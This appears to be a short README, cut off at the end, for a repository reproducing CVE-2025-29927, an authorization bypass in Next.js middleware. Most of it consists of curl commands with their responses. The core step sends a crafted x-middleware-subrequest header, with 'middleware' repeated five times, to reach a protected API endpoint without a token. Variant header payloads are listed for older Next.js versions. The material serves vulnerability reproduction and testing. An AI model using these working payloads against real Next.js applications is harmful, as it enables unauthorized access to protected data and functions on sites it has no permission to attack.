Exploit for CVE-2025-29927

CVE-2025-29927 Authorization Bypass reproduction This repository is a reproduction of the CVE-2025-29927 vulnerability in the next package How to reproduce Follow the steps below to clone, and run the Next.js application Test authorization denies access to the /api/hello endpoint “`bash $ curl https://localhost:3000/api/hello {"error":"Unauthorized"}% “` Test authorization works when token is provided “`bash $ curl -H "Authorization: my-jwt-token-here" https://localhost:3000/api/hello {"message":"Hello World"}% “` Now it can also be bypassed if we nest middleware 5x times into the special x-middleware-subrequest header: “`bash curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" https://localhost:3000/api/hello {"message":"Hello, World"} “` CVE-2025-29927 exploitation for older Next.js versions Next.js 12 and 13 versions used to have a different naming convention for the middleware file (_middleware.js), which was changed to middleware.js in Next.js 14. This vulnerability can be exploited in older versions by using the _middleware.js file. For example, the following payloads would apply, depending on the Next.js version and your routing convention: curl -H "x-middleware-subrequest: middleware" https://localhost:3000/api/hello (for Next.js versions 12.2 with the middleware.js file in the root of the app, not inside the pages directory) curl -H "x-middleware-subrequest: src/middleware" https://localhost:3000/api/hello curl -H…Read More